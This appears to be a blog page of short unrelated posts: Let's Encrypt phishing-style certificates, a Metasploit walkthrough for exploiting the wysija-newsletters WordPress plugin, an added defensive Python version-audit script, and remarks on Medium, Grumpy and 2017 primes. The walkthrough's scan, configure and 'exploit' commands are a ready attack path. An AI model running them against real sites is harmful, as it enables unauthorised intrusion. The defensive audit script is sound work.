Myles Braithwaite

By December 8, 2016, Let's Encrypt had issued 409 certificates containing “Paypal” in the hostname; that number is up to 709 as of this morning. Other targets include BankOfAmerica (14 certificates), Apple, Amazon, American Express, Chase Bank, Microsoft, Google, and many other major brands. LetsEncrypt validates only that (at one point in time) the certificate applicant can publish on the target domain; the CA also grudgingly checks with the SafeBrowsing service to see if the target domain has already been blocked as malicious, although they “disagree” that this should be their responsibility. Let's Encrypt’s short position paper is worth a read; many reasonable people agree with it.

This is a quick blog post about exploiting a WordPress website using Metasploit on Kali Linux.

Identify a Remote Host

msf > db_nmap -v -sV

Scan an Entire Network

This will save the results to the Metasploit database:

msf > nmap -v -sV -oA subnet_1
  • hosts will list all the hosts found by nmap.
  • hosts -R will add them to the list of hosts to exploit.

Searching for a WordPress Vulnerability

msf > search name:wordpress

Use an Exploit

This will select an exploit to use:

msf > use exploit/unix/webapp/wp_wysija_newsletters_upload

This will list the payloads that are compatible with the exploit:

msf exploit(wp_wysija_newsletters_upload) > show payloads

This will show what software and version will be targeted:

msf exploit(wp_wysija_newsletters_upload) > show targets
Exploit targets:

    Id  Name
    --  ----
    0   wysija-newsletters < 2.6.8

Next configure the Exploit

msf exploit(wp_wysija_newsletters_upload) > show options
Module options (exploit/unix/webapp/wp_wysija_newsletters_upload):

    Name        Current Settings    Required    Description
    ----        ----------------    --------    -----------
    Proxies                         no          A proxy chain of format type:host:port[,type:host:port][...]
    RHOST                           no          The target address
    RPORT       80                  yes         The target port
    SSL         false               no          Negotiate SSL/TLS for outgoing connections
    TARGETURI   /                   no          The base path to the wordpress application
    VHOST                           no          HTTP server virtual host

Exploit target:

    Id  Name
    --  ----
    0   wysija-newsletters < 2.6.8

Here is where we set all the options:

msf exploit(wp_wysija_newsletters_upload) > set RHOST
msf exploit(wp_wysija_newsletters_upload) > set RPORT 443
msf exploit(wp_wysija_newsletters_upload) > set SSL true
msf exploit(wp_wysija_newsletters_upload) > set VHOST

Run the Exploit

msf exploit(wp_wysija_newsletters_upload) > exploit
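
The defender's side of the walkthrough above, as an added example that is not part of the original post: a local audit that reads the plugin header from a WordPress tree on disk and reports whether the installed version falls in the range the module lists as its target (< 2.6.8). The plugin directory name, the function names and the sample trees are assumptions constructed for illustration.

```python
import re
import tempfile
from pathlib import Path

# Threshold from the module's target line on this page: "wysija-newsletters < 2.6.8".
TARGETED_BELOW = (2, 6, 8)
PLUGIN_DIR = "wysija-newsletters"  # assumption: installed under this directory name
VERSION_RE = re.compile(r"^[ \t/*#@]*Version:\s*(\S+)", re.M | re.I)

def version_tuple(text):
    """'2.6.7' -> (2, 6, 7); returns () when no dotted number is found."""
    m = re.match(r"\d+(?:\.\d+)*", text.strip())
    return tuple(int(n) for n in m.group(0).split(".")) if m else ()

def installed_version(plugin_path):
    """Version from the plugin header in a top-level PHP file, else None."""
    for php in sorted(Path(plugin_path).glob("*.php")):
        head = php.read_text(errors="replace")[:8192]  # header sits at the top of the file
        m = VERSION_RE.search(head) if "Plugin Name:" in head else None
        if m:
            return m.group(1)
    return None

def audit(wp_root):
    """Return 'absent', 'unknown', 'targeted' or 'ok' for one WordPress tree."""
    plugin = Path(wp_root) / "wp-content" / "plugins" / PLUGIN_DIR
    if not plugin.is_dir():
        return "absent"
    parsed = version_tuple(installed_version(plugin) or "")
    if not parsed:
        return "unknown"  # plugin present but version unreadable: check by hand
    return "targeted" if parsed < TARGETED_BELOW else "ok"

def make_sample_tree(root, version):
    """Build a constructed WordPress tree containing a stub plugin header."""
    plugin = Path(root) / "wp-content" / "plugins" / PLUGIN_DIR
    plugin.mkdir(parents=True)
    header = f"<?php\n/*\nPlugin Name: Sample Newsletter Stub\nVersion: {version}\n*/\n"
    (plugin / "index.php").write_text(header)
    return str(root)

if __name__ == "__main__":
    for v in ("2.6.7", "2.6.8", "2.10.1", "trunk"):
        with tempfile.TemporaryDirectory() as tmp:
            print(v, "->", audit(make_sample_tree(tmp, v)))
```

Versions are compared as integer tuples rather than strings, so 2.10.1 is correctly treated as newer than 2.6.8, and an unparseable version is reported as unknown instead of being silently passed.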


Wow, that was way easier than I thought it would be.
Although, I guess so is everything.

But I don’t think we’ll grow old together, Medium and I. I suspect it’ll end quite tragic, actually. $132,000,000 is a lot of money after all, and that’s how much venture capital Medium has been dipped in. Before having a prayer or a song about how to turn into that multi-billion-dollar business it must to satisfy the required rate of return.


Grumpy is an experimental Python runtime for Go. It translates Python code into Go programs, and those transpiled programs run seamlessly within the Go runtime. We needed to support a large existing Python codebase, so it was important to have a high degree of compatibility with CPython (quirks and all). The goal is for Grumpy to be a drop-in replacement runtime for any pure-Python project.

2017 is not just another prime number

TJ Wei on why 2017 is not just any prime number:

2017π (rounds to nearest integer) is a prime.

2017e (rounds to nearest integer) is a prime.

The sum of all odd primes up to 2017 is a prime number, i.e. 3+5+7+11+...+2017 is a prime number.

The sum of the cube of gap of primes up to 2017 is a prime number. That is (3-2)^3 + (5-3)^3 + (7-5)^3 + (11-7)^3 + ... + (2017-2011)^3 is a prime number.